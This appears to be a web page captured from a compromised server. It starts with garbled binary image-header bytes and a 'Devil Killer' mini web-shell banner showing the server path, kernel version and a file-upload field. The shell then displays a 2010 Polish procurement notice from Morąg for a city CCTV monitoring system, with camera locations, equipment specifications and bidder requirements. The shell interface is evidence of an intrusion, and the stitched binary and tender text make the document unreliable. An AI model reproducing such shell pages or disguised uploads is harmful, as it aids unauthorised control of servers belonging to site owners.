JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100120/16808-N-2010.html

<p class="kh_header"><b>Morąg: Zakup i instalacja systemu monitoringu wizyjnego miasta Morąg</b><br>
<b>Numer ogłoszenia: 16808 - 2010; data zamieszczenia: 20.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Morągu , ul. 11 Listopada 9, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 089 7572231, faks 089 7572120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i instalacja systemu monitoringu wizyjnego miasta Morąg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: dostawa i instalacja systemu monitoringu miejskiego CCTV IP dla miasta Morąg.  

Zakres rzeczowy obejmuje:
- dostawę i instalację kamer monitorujących z oprzyrządowaniem i oprogramowaniem
- dostawę i instalację urządzeń do transmisji danych wraz z oprogramowaniem sterującym
- wyposażenie biurowe i techniczne centrum monitorującego i archiwizującego w budynku Komisariatu Policji w Morągu
- roboty budowlane (elektryczne i wykończeniowe) w dyżurce Komisariatu Policji  w Morągu
- uruchomienie monitoringu wraz z przeszkoleniem obsługi i robotami towarzyszącymi w zakresie zaewidencjonowania zamontowanych urządzeń
- udzielenia 36-miesięcznej gwarancji obejmującej także serwis - zgodnie z wzorem umowy i kartą gwarancyjną.

System ma zapewniać wyświetlanie obrazu, rejestrację i sterowanie kamerami oraz umożliwić przegląd zapisu z rejestratora w centrum monitorującym. Centrum monitoringu znajdować się będzie w budynku Komisariatu Policji.
Transmisja sygnałów video, sterowań i sygnałów dodatkowych odbywać się będzie drogą radiową w wolnym paśmie 5,6 - 5,9 GHz oraz 866 Mhz.  System monitoringu ma zapewnić możliwość nieprzerwanej, ciągłej obserwacji newralgicznych punktów miasta Morąg. Każda z 9 kamer (+ dwie przenośne) stworzy Punkt Monitorowania (PM), który bezpośrednio lub pośrednio, za pomocą dwóch Punktów Przekaźnikowych (PP), przekaże obraz do Centrum Monitoringu (CM).
Budowa wszystkich punktów kamerowych ma być jednakowa pod względem urządzeń, rozwiązania technicznego i technologii wykonania a rozwiązania sprzętowe systemu mają zapewnić możliwość jego rozbudowy.

Zestawienie Punktów Monitorowania (PM):
1. Skrzyżowanie ul. Żeromskiego i ul. Śląskiej - PM1
2. Skrzyżowanie ul. 3-go Maja i ul. Mickiewicza - PM2
3. Budynek przy ul. Mickiewicza 3 - PM3
4. Skrzyżowanie ul. Mickiewicza i ul. Kujawskiej - PM4
5. Słup oświetleniowy ul. Parkowa - PM5
6. Budynek apteki przy ul. J.G. Herdera - PM6
7. Rondo ul. 11-Listopada - PM7
8. Urząd Pracy przy ul. Dąbrowskiego - PM8
9. Rondo przy ul. Pomorskiej - PM9

oraz 2 kamery dodatkowe wraz z niezbędnym sprzętem - jako przenośne (o tych samych parametrach co opisane w projekcie), które należy uwzględnić w ofercie.
Wszystkie punkty monitorowania (PM) jak i Centrum Monitoringu (CM) będą pracowały w cyfrowej sieci transmisji danych.  Zasadniczym medium transmisji sygnałów wizji, sterowania i danych ma być radiowy system transmisji sygnałów w technologii cyfrowej. W celu zapewnienia wysokiej jakości przesyłanych obrazów, ich rejestracji w CM oraz równoczesnej transmisji sygnałów sterowania kamerami, dodatkowych sygnałów służących np. do zdalnej (z Centrum Monitorowania - CM) konfiguracji systemu, zdalnej synchronizacji czasu, sygnałów alarmowych itp. należy zastosować szerokopasmowy, cyfrowy, radiowy system pracujący w paśmie niekoncesjonowanym 5,8GHz
System Monitoringu Wizyjnego miasta Morąg będzie spełniał następujące założenia:
- obraz przekazywany ze wszystkich kamer ma być wyświetlany w trybie rzeczywistym,
- transmisja obrazu ze wszystkich kamer ma się odbywać w trybie triplex,
- system musi dawać możliwość zdalnego, ręcznego i automatycznego sterowania ruchem kamer i zmianą ogniskowych obiektywów,
- możliwość cyfrowej rejestracji nagrań przez co najmniej 30 dni
- poprawne działanie i funkcjonowanie przy o świetleniu dziennym i nocnym pochodzącym od istniejących lamp ulicznych,
- możliwość jednoczesnej wizualizacji obrazu ze wszystkich kamerach jednocześnie i zarazem z każdej kamery z osobna w postaci pełnoekranowej,
- możliwość dokonywania przez obsługę Centrum Monitoringu archiwizacji wybranych nagrań na nośnikach DVD;
- system musi mieć budowę modułową umożliwiającą jego swobodną późniejszą rozbudowę.

Punkty Monitorowania i Punkty Przekaźnikowe- szczegóły
Składać będą się z kamery szybkoobrotowej w obudowie hermetycznej, wraz z urządzeniami które uchronią kamerę przed roszeniem oraz mrozem tj. grzałką oraz wentylatorami. Kamery muszą działać nawet przy bardzo małym świetle. Szczegółowe wymagania co do kamer umieszczono w projekcie. Kolejnym urządzeniem Punktu Monitorowania jest urządzenie nadawcze wraz z odpowiedniej klasy anteną kierunkową, oraz skrzynka telekomunikacyjna wewnętrzna lub zewnętrzna (w zależności od lokalizacji), w której umieszczone zostaną urządzenia elektroniczne umożliwiające transmisję danych poprzez radiową sieć transmisyjną.
Kamery zostaną zamontowane na istniejących słupach lub elewacjach budynków.
Założono zastosowanie kamer jednego producenta, dzięki czemu zachowana zostanie pełna kompatybilność wszystkich punktów kamerowych pod względem sterowania i programowania funkcji poszczególnych kamer.

Kamery szybkoobrotowe o parametrach:
-Rozdzielczość: 520 TVL (Kolor), 570 TVL (B/W)
-30x Auto Focus Zoom optyczny
-Ruchomy filtr IR - dzień/noc
-Zwolniona migawka (Min. o świetlenie 0,0007 Lux)
-Stabilizator obrazu (DIS)

Kamery które zostaną zainstalowane muszą umożliwić pracę przy różnym natężeniu oświetlenia i w różnych warunkach atmosferycznych. W czasie dnia kamery pracują w trybie kolorowym, w nocy lub w warunkach słabego oświetlenia kamera przełącza się w monochromatyczny tryb pracy. Kamery muszą być wyposażone w funkcję AutoTrack, polegającą na detekcji ruchu w zasięgu pola widzenia kamery, oraz dokonywania automatycznego zbliżenia na poruszający się obiekt i podążanie za nim. Podzespoły kamery zintegrowanej (kamera, obiektyw, mechanizm, układy elektroniczne) muszą być zamontowane w obudowie o stopniu ochrony IP 66. Dodatkowo kamery muszą być umieszczane w obudowach wandaloodpornych, chroniących je przed skutkami uderzeń, co jest szczególnie istotne w przypadku ich lokalizacji w miejscach dostępnych. W kamerach musi być zastosowana automatyczna kontrola wzmocnienia oraz tryb spowolnionej migawki, co jest niezbędne podczas pracy przy niskim natężeniu oświetlenia (np. w warunkach nocnych). Przełączanie trybu pracy kamery z dziennego na nocny odbywać się musi automatycznie, w przypadku natężenia oświetlenia niewystarczającego do pracy w trybie dziennym.
Zdalne sterowanie każdą kamerą będzie odbywało się z centrum monitoringu z wykorzystaniem standardowych interfejsów szeregowych. Kamera współpracować musi zarówno z interfejsami RS - 232 jak i RS - 485. Poza sterowaniem prac ą kamery (obroty zarówno w płaszczyźnie pianowej jak i poziomej oraz dokonywanie zbliżeń obrazu - zoom optyczny oraz cyfrowy) musi istnieć możliwość zaprogramowania innych funkcji, takich jak ustawienie presetów czy tras monitorowania.
Wszystkie zestawy w PM przystosowane muszą być do efektywnej transmisji nawet w silnie zakłóconym środowisku przemysłowym. 
Założono, że Punkty Monitorowania PM oraz Punkty Przekaźnikowe PP będą zasilane poprzez zasilacze awaryjne, umieszczonych w skrzynkach PM, Zasilanie odbywać się będzie sieci energetycznej. Ponieważ kamery wymagają zasilania napięciem zmiennym o wartości 24 V, zostaną zastosowane zasilacze 230/24V AC. W każdej szafce punktu kamerowego oraz dostępowego będzie zamontowany zasilacz UPS, umożliwiający podtrzymanie pracy danego PM oraz PP przez co najmniej 30 minut braku napięcia w sieci zasilającej. Poniżej wykonano bilans mocy dla PM oraz PP.
Dla zapewnienia widoczności optycznej pomiędzy Punktami Monitorowania a punktami Przekaźnikowymi a Centrum Monitoringu zaistniała konieczność zastosowania na dachu Szpitala aluminiowego masztu antenowego (typowy projekt masztu wraz z obliczeniami wytrzymałościowymi zawarty jest w projekcie budowlanym).

Centrum Monitoringu - szczegóły
Centrum Monitoringu zlokalizowane będzie w budynku Komisariatu Policji w Morągu i wyposażone w urządzenia rejestrujące. Głównym zadaniem Centrum Monitorowania jest rejestracja obrazów przesyłanych z kamer oraz ich wizualizacja na monitorach. W Centrum Monitoringu poza stanowiskami operatorów znajdować się będzie urządzenie z zainstalowanym oprogramowaniem umożliwiającym rejestrację obrazów przesyłanych z punktów kamerowych.
Ze względu na występowanie w instalacji elementów narażonych na skutki wyładowań atmosferycznych (anteny, metalowe konstrukcje wsporcze) wymagane jest zaprojektowanie i wykonanie ochrony odgromowej i przepięciowej. Ochronę przepięciową i odgromową urządzeń radiowych należy wykonać ściśle zgodnie z wymaganiami producenta systemu radiowego, stosując odgromniki i
ochronniki przepięciowe wymagane i zalecane przez producenta systemu radiowego.
Schemat ideowy oraz schemat połączeń kablowych w Centrum Monitorowania zostały dołączone do projektu budowlanego w postaci załączników.

Główne stanowisko operatora będzie się mieściło w budynku Policji w Morągu w dyżurce na parterze. Zostanie tam zainstalowane jedno stanowisko operatorskie.
Stanowisko operatora systemu będzie się składać z:
- dwóch monitorów LCD o przekątnej 26  (przykładowe parametry monitora zawarte są w projekcie budowlanym):
           pierwszy monitor - obrazy z kamer w układzie 3x3
           drugi monitor - obraz z wybranej kamery w trybie pełnoekranowym
- klawiatury z joystickiem do sterowania kamerami (przykładowe parametry klawiatury cyfrowej zawarte są w projekcie budowlanym)

Zapis będzie się odbywał na dedykowanym serwerze lub rejestratorze który będzie umieszczony w szafie typu rack wraz z pozostałymi urządzeniami w wyznaczonym pomieszczeniu Komendy Policji. Pojemność dysków do zapisu wideo umożliwi jednoczesny, ciągły zapis obrazów z wszystkich kamer przez 24 godziny na dobę, przez okres nie krótszy niż 30 dni, przy prędkości zapisu obrazów z każdej kamery > 12 klatek/s. Zarejestrowane obrazy będą zabezpieczone przed możliwością ingerencji w zapis i ich cyfrowej modyfikacji.
Przewiduje się wyposażenie serwera rejestracji w pojemność dyskową o wartości 8TB.
Pojemność dyskowa zapewni rejestrację obrazu z 9 kamer systemu monitoringu miejskiego. Pozwoli to na rozbudowę systemu monitorowania w dalszych etapach realizacji inwestycji. Konfiguracja komputera serwera musi gwarantować możliwość rozbudowy macierzy dyskowej do minimum 20 TB.

W celu podtrzymania pracy systemu w przypadkach awarii zasilania ~ 230 V zostanie zastosowany system awaryjnego zasilania złożony z zasilacza UPS z bateriami o odpowiedniej pojemności. Wymagane jest, aby system zasilania awaryjnego umożliwiał podtrzymanie napięcia w CM przez co najmniej 60 minut. 
Zasilacz UPS należy zamontować w szafie rack w pomieszczeniu Centrum Monitoringu, Przewidziano prace zasilacza UPS z dwoma modułami baterii 2 x EBM zapewniającymi utrzymanie zasilanie przy pełnym obciążeniu przez ok. 65 min. w razie zaniku głównego napięcia zasilania.

Zezwala się na dobór urządzeń zamiennych o parametrach równorzędnych lub wyższych niż przedstawione w opisie.

Prace dodatkowe (w dyżurce):
- szpachlowanie ścian
- pomalowanie ścian farbą zmywalną
- wykonanie podwieszonego sufitu na stelażu
- wykonanie instalacji oświetleniowej pomieszczenia
- wymiana drzwi do dyżurki
- wymiana drzwi do pomieszczeń dla osadzonych
- wymiana biurka

SPECYFIKACJA TECHNICZNA URZĄDZEŃ

1.	Kamera szybkoobrotowa
Minimalne warunki techniczne

410K PIXEL, 1/4 Exview HAD CCD
Rozdzielczość: min. 520 TVL (Kolor), 570 TVL (B/W)
30x Auto Focus Zoom optyczny, 12x Zoom cyfrowy
Ruchomy filtr IR - dzień/noc
Zwolniona migawka (Min. oświetlenie 0,0007 Lux)
Szeroki zakres dynamiki WDR (128x)
Auto Flip (Automatyczny obrót o 180°)
Zabezpieczenie przed niskim zasilaniem
Programowanie kamery: Swing(2), Presets(250), Group(12), Tour, Trace, Spiral, Alarmy (4in/1Out)
Zaimplementowane protokoły: D-max, Pelco P, Pelco D, Samsung Techwin
Obudowa wandaloodporna, IP 66
Stabilizator obrazu (DIS)

Standard sygnału NTSC / PAL
Przetwornik 1/4 Exview HAD CCD
Rozdzielczość min. 520 TVL (Kolor), 570 TVL (B/W)
Obiektyw 30x zoom optyczny
Zoom cyfrowy 12x (całkowity zoom 420x)
Kąt widzenia 55,8°(Wide) - 1,7°(Tele)
Minimalne oświetlenie
0,00014 Lux 
Stosunek sygnału do szumu >50dB (AGC wyłączone)
Wyjście wizyjne 1 Vp-p 75 Om
Synchronizacja Wewnętrzna / Z sieci zasilającej (Line Lock)
Focus Automatyczne / Ręczne
Kompensacja tła Włączona / Wyłączona
WDR Automatyczne / Wyłączone / Ręczne (Poziom 1~126)
Detekcja ruchu Włączona / Wyłączona
Auto Flip Włączona / Wyłączona
Elektroniczna migawka Automatyczna
Balans bieli Automatyczny / Outdoor / Indoor
Wejścia / wyjścia alarmowe 4 wejścia / 1 wyjście programowalne
Zakres obrotu Pan / Tilt  0°~360° / 0°~92°
Prędkość obrotu 0,1°~240° / sekundę (64 poziomy)
Ilość presetów 250
Prędkość presetu 360° / sekundę (64 poziomy)
Strefy prywatności min. 4 programowalne strefy
System komunikacji RS-485 / 422; D-max, Pelco P, Pelco D, Samsung
OSD Wbudowane w kamerę
Temperatura pracy -40°C~50°C
Wilgotność pracy Mniejsza niż 90% RH
Masa do 6,0kg (bez uchwytu)
Konstrukcja Obudowa aluminiowa, wandaloodporna kopuła (PC)
Pobór mocy 21W (Max)
Zasilanie AC24V, 60/50 Hz

2.	Klawiatura sterująca
Minimalne warunki techniczne

5,2 TFT LCD z ekranem dotykowym
Możliwość kontrolowania do 512 odbiorników CCTV i kamer
Możliwość wyświetlania kamery na monitorze LCD
Współpraca z jednostkami alarmu
Kontrola do 64 monitorów i do 500 pozycji Preset

Kontrola 
Pan/Tilt, Zoom, Focus, Power, Auto Pan, Aux Control x2, Preset, Group, Trace, Krosownica, Rejestrator, Dzielnik obrazu
Współpraca klawiatury CCTV Receiver, kamera obrotowa, Krosownica, Rejestrator, Dzielnik obrazu
Klawiatury podrzędne  max 8 sztuk
Wyświetlacz 5,2 TFT LCD z ekranem dotykowym
Transmisja RS-485 (422)
Prędkość transmisji RS-485- 9600bps, N, 8, 1
Połączenie kabel połączony z junction box, klawiatura pobiera zasilanie z junction box
Kontrola urządzeń do 512 
Zestaw Junction box, 10 m kabla
Temperatura pracy od 0°C ~+40°C
Pobór mocy  do 6W
Zasilanie DC 12V, 1A

3.Rejestrator cyfrowy
Minimalne warunki techniczne

Wyświetlanie i nagrywanie w czasie rzeczywistym - 400FPS,
Archiwizacja na nośnikach DVD i pendrive przez port USB 2.0 oraz na twardym dysku
Zapis dźwięku dla 16 kanałów
Jednoczesny: podgląd na żywo, nagrywanie, odtwarzani, archiwizacja zdarzeń i praca                              w sieci,
Kompresja video MPEG-4, połączona z kodekiem audio G.723,
Graficzny interfejs użytkownika (w języku polskim), obsługa za pomocą myszki na USB,
Sterowanie za pomocą klawiatury, pilotem, z panelu przedniego
Sterowanie kamerami PTZ,
16/4 wej./wyj. alarmowych,

Wideo
Wejścia: 16CH BNC
Wyjścia: 2CH (BNC), 1CH(SPOT), 16CH(przelotowe), S-Video(1CH), VGA wyjście (Max. 1024x768)
Audio 
Wejścia/Wyjścia: 16 wejść i 2 wyjścia (1CH do odtwarzania z wybranego wejścia audio)
Rozdzielczość
Podgląd: 4x4, 2x2, 1x1 (NTSC:720x480, PAL:720x576)
Nagrywanie: NTSC: 720x480, 720x240, 320x240, PAL: 704x576, 704x288, 352x288
Kompresja 
Algorytm: MPEG-4 - wideo, G.723 - audio
Funkcje
Pentaplex: Nagrywanie, odtwarzanie, podgląd na żywo, archiwizacja i sieć w tym samym czasie
Sterowanie: Panel przedni, pilot, mysz, klawiatura 
Ilość klatek 
Nagrywanie (FPS): 400(352x288), 200(704x288), 100(704x576) w PAL, Max 25 w D1 (704x576) na kamerę
Nagrywanie
Tryby: Rzeczywisty, harmonogram, detekcja , alarm
Alarm(Zdarzenie,Detekcja): Wybór kanału nagrywania i funkcja pre-recording trwająca: 30sek, 1,2,3,4,5,6,7,8,9,10,20,30,40,50 min
Wej. / Wyj. Alarmowe: 16 wejść alarmowych (NO lub NC), 4 wyjścia przekaźnikowe (NO lub NC)
Odtwarzanie Normalne, Szybkie i Search Jog & Shuttle: Normalne: x1 prędkość, przewijanie przód, tył: x2,x4,x8,x16 NTSC, PAL), tryby wyszukiwania w/g: zdarzeń alarmowych, detekcji ruchu, czasu
HDD 
Typ: SATA lub SATA II HDD (8szt. po 1 TB)
Sieć
Protokoły: 10/100 Base-T TCP/IP, UDP, HTTP, SMTP, NTP, DHCP, DDNS
Funkcje sieciowe: Podgląd na żywo, sterowanie PTZ, odtwarzanie, archiwizacja, Web (IE) viewer, hierarchiczna, struktura dostępu, konfiguracja zdalna, dwukierunkowe audio, oprogramowanie CMS
Ustawienie czasu: Obsługa Network Time Protocol
PTZ 
Pan/Tilt/Zoom: RS485
Archiwizacja 
Kopia: DVD i USB 2.0, dysk twardy
USB 2.0: Backup dziennika zdarzeń (USB)
Aktualizacja
Sieć / USB2.0 Aktualizacja firmware za pomocą USB, sieć
Zasilanie AC 100~240V

4.Moduł telemetrii do sterowania kamerami obrotowymi oraz rejestratorami

Minimalne warunki techniczne

Dwukierunkowe przesyłanie protokołu RS485, RS232 oraz TTL 5V
Sterowanie kamerami obrotowymi
Sterowanie rejestratorami DVR
Zdalne zarządzanie systemami alarmowymi oraz ppoż
10 niezależnych kanałów pracy
Moc nadawcza 500mW do regulowania
Transmisja dwukierunkowa (half duplex)
Nie wymaga widzialności optycznej anten
Możliwość retransmisji sygnału
Antena prętowa, uchwyt masztowy

Częstotliwość pracy od 869,4 do 869,65 MHz
Moc  200mW oraz 500mW
Zasięg 6 km
Prędkość transmisji 1200, 2400, 4800, 9600bps
Format 8N1 oraz 8E1
Czułość -115dBm
Impedancja 50 Ohm
Modulacja RC2FSK
Temperatura pracy -20 do 55°C 
Zasilanie 10-15V/400mA DC

5.Nadajnik i odbiornik video do bezprzewodowej transmisji obrazu                      i dźwięku
Minimalne warunki techniczne

8 niezależnych kanałów video
Zintegrowana antena kierunkowa
Minimalny zasięg - 5km
Retransmisja sygnału
Transmisja w czasie rzeczywistym

Częstotliwość pracy od 5725MHz do 5875MHz
Moc  <25mW; 13-16 dBm
Czułość odbiornika -85dBm
Impedancja 50 Ohm
Modulacja FM
Format video PAL, NTSC
Złącza video BNC 75 Ohm, 1 Volt p-p
Audio BNC stereo 600 Ohm, 1 Volt p-p
Pasmo przenoszonego dźwięku 30Hz do 12kHz
Zasilanie 10-12V/500mA DC
Temperatura pracy -20 do 55°C

6.	Macierz dyskowa HDD
Minimalne warunki techniczne

8 TB pamięci w macierzy
Opcja łączenia macierzy
Obsługa min. 8 dysków SATA lub SATA 2 z funkcją HOT-SWAP
Inteligentny system regeneracji po zaniku zasilenia

RAID Mirroring - wbudowana funkcja
Możliwości konfiguracyjne HDD Min. 8x HOT-SWAP (SATA lub SATA II)
Interfejs 
1x RJ45 Gigabit Ethernet dla rejestratora
1x RJ45 Gigabit Ethernet dla macierzy
Temperatura
Użytkowania: +5 °C ~ +45 °C
Przechowywania: -10 °C ~ +55 °C
Wilgotność względna
Użytkowania: 30 ~ 80% bez kondensacji
Przechowywania: 93% bez kondensacji
Uzas. / pobór prądu 100~230 VAC / maks. 85 W (śr. 60 W)

Zakres przedmiotu zamówienia opisuje także dokumentacja projektowa i przedmiary robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 35.12.00.00-1, 51.31.40.00-6, 34.97.10.00-4, 32.32.35.00-8, 45.31.00.00-3, 48.80.00.00-6, 30.23.31.41-1, 48.42.10.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 4 500.00 PLN (słownie:  cztery tysiące pięćset  00/100 PLN)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655, z późn. zm.), spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych.
Warunek do spełnienia i sposób dokonywania jego oceny:
1. Sytuacja podmiotowa wykonawcy
Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych
2. Zdolność ekonomiczna i finansowa
Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
3. Zdolność techniczna
Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zamawiający żąda złożenia:
1. Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż  6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę wspólną.
2.Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę wspólną.
